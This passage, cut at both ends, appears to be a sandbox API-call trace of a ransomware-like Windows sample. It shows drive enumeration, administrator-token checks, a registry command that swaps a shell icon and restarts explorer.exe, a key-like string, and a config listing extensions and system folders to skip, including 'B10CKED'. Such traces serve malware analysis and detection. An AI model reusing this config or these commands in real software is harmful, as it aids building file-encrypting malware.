\"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"[ICO_PATH],0\"\r\ntaskkill /f /IM explorer.exe && start explorer.exe\r\n") returned 1410 [0174.965] GetCurrentThreadId () returned 0x728 [0174.965] GetCurrentThreadId () returned 0x728 [0174.965] GetCurrentThreadId () returned 0x728 [0174.965] GetCurrentThread () returned 0xfffffffe [0174.965] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0x0) returned 0 [0174.965] GetLastError () returned 0x3f0 [0174.965] GetCurrentProcess () 
returned 0xffffffff [0174.965] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0xb8) returned 1 [0174.965] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x2, TokenInformation=0x13c7ae0, TokenInformationLength=0x400, ReturnLength=0x12fc60 | out: TokenInformation=0x13c7ae0, ReturnLength=0x12fc60) returned 1 [0174.965] CloseHandle (hObject=0xb8) returned 1 [0174.965] AllocateAndInitializeSid (in: pIdentifierAuthority=0x4e3754, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x12fc5c | out: pSid=0x12fc5c*=0x2c6438*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0174.965] EqualSid (pSid1=0x2c6438*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13c7b44*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 0 [0174.965] EqualSid (pSid1=0x2c6438*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13c7b60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 0 [0174.965] EqualSid (pSid1=0x2c6438*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13c7b6c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), 
SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0174.965] GetCurrentProcess () returned 0xffffffff [0174.965] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc68 | out: TokenHandle=0x12fc68*=0xb8) returned 1 [0174.965] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12fc64 | out: TokenInformation=0x0, ReturnLength=0x12fc64) returned 0 [0174.965] GetLastError () returned 0x7a [0174.965] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x2c76d8 [0174.965] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x2c76d8, TokenInformationLength=0x14, ReturnLength=0x12fc64 | out: TokenInformation=0x2c76d8, ReturnLength=0x12fc64) returned 1 [0174.965] GetSidSubAuthorityCount (pSid=0x2c76e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x2c76e1 [0174.965] GetSidSubAuthority (pSid=0x2c76e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x2c76e8 [0174.965] LocalFree (hMem=0x2c76d8) returned 0x0 [0174.965] CloseHandle (hObject=0xb8) returned 1 [0174.965] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0174.966] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0174.966] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0174.966] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0174.966] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0174.966] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0174.966] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0174.966] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0174.966] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0174.967] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0174.967] GetDriveTypeW (lpRootPathName="P:\\") 
returned 0x1 [0174.967] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0174.967] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0174.967] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0174.967] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0174.967] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0174.967] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0174.968] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0174.968] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0174.968] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0174.968] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0174.968] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0174.968] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0174.968] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0174.968] FindResourceW (hModule=0x400000, lpName="NDNF", lpType=0xa) returned 0x51c420 [0174.968] LoadResource (hModule=0x400000, hResInfo=0x51c420) returned 0x516824 [0174.968] SizeofResource (hModule=0x400000, hResInfo=0x51c420) returned 0x267 [0174.968] LockResource (hResData=0x516824) returned 0x516824 [0174.969] FreeResource (hResData=0x516824) returned 0 [0174.969] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0174.969] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0174.969] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0174.969] LockResource (hResData=0x50d64c) returned 0x50d64c [0174.969] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0174.969] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x140deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0174.969] FreeResource (hResData=0x50d64c) returned 0 [0174.969] WideCharToMultiByte (in: 
CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0174.969] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x141500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0174.969] GetCurrentThreadId () returned 0x728 [0174.969] GetCurrentThreadId () returned 0x728 [0174.969] GetCurrentThreadId () returned 0x728 [0174.969] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a0128, cbMultiByte=615, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 615 [0174.969] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a0128, cbMultiByte=615, lpWideCharStr=0x13ac65c, cchWideChar=615 | out: lpWideCharStr="[NF_START]\r\nAST\r\nAFN\r\nELST\r\nEXE\r\nLNK\r\nHTA\r\nPEK\r\nSEK\r\nB10CKED\r\nTMP\r\nICO\r\n000\r\nSYS\r\nDAT\r\nRTF\r\nINF\r\nDLL\r\nDAT\r\nREG\r\nDRV\r\nDEV\r\nPIF\r\nMBR\r\nINI\r\nXML\r\nLIST\r\nTTF\r\nLOG\r\nJA\r\nCOM\r\nBAT\r\nCMD\r\nVBS\r\nJS\r\nCFG\r\nDOWNLOAD\r\nNFO\r\nMSI\r\nCHK\r\nDMP\r\nMUI\r\nDUN\r\nISP\r\nISW\r\nCAB\r\nEFI\r\nHLP\r\nMSU\r\nHLP\r\nBIN\r\nLNG\r\nTORRENT_INFO\r\nTORRENT\r\nHTM\r\nHTML\r\nCHM\r\nLANG\r\nSTYLE\r\nMP3\r\nFLAC\r\nOGG\r\nWMA\r\nGIF\r\nJAVA\r\nCUR\r\nANI\r\n[NF_END]\r\n[ND_START]\r\n\\WINDOWS\r\n\\PROGRAM FILES\r\n\\GAMES\r\n\\APPDATA\\\r\n\\APPLICATION DATA\\\r\n\\LOCAL SETTINGS\\\r\n\\TEMP\\\r\n\\PROGRAMDATA\\\r\n\\BOOT\\\r\n\\MSOCACHE\\\r\n\\DEFAULT USER\\\r\n\\SAMPLE\r\n\\EXAMPLE\r\n\\I386\r\n\\TEMPORARY\r\n\\TOR BROWSER\\\r\n\\BROWSER\r\nBROWSER\\\r\n[ND_END]") returned 615 [0174.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_START]", 
cchCount2=10) returned 2 [0174.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, 
lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, 
lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, 
lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.970] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", 
cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 2 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.971] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) 
returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", 
cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.972] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0174.973] CompareStringW (Locale=0x400, 